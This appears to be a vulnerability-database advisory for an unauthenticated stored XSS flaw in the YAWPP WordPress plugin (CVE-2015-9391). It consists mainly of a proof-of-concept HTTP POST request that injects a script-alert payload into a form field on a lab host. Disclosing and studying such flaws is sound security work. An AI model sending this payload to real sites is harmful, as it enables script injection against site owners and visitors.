Lucene search
Ethicalhack3rWPEX-ID:9CF3791D-60CF-4DE4-A197-23779A884CD9HistoryDec 09, 2015 - 12:00 a.m.
YAWPP <= 1.2.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
2015-12-0900:00:00
ethicalhack3r
7
0.001 Low
EPSS
Percentile
29.5%
The yawpp WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability.
POST /wordpress-4.3/?p=4 HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress-4.3/?p=4
Cookie: wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1449056570
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
field1=<script>alert(/XSS-Field1/)</script>&field2=test2%40gmail.com&id=1&submit_yawpp=ValiderRelated
cve
cve
CVE-2015-9391
2019-09-20 15:15:12
nvd
nvd
CVE-2015-9391
2019-09-20 15:15:12
wpvulndb
wpvulndb
YAWPP <= 1.2.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
2015-12-09 00:00:00
prion
prion
Design/Logic Flaw
2019-09-20 15:15:00
cvelist
cvelist
CVE-2015-9391
2019-09-20 14:59:52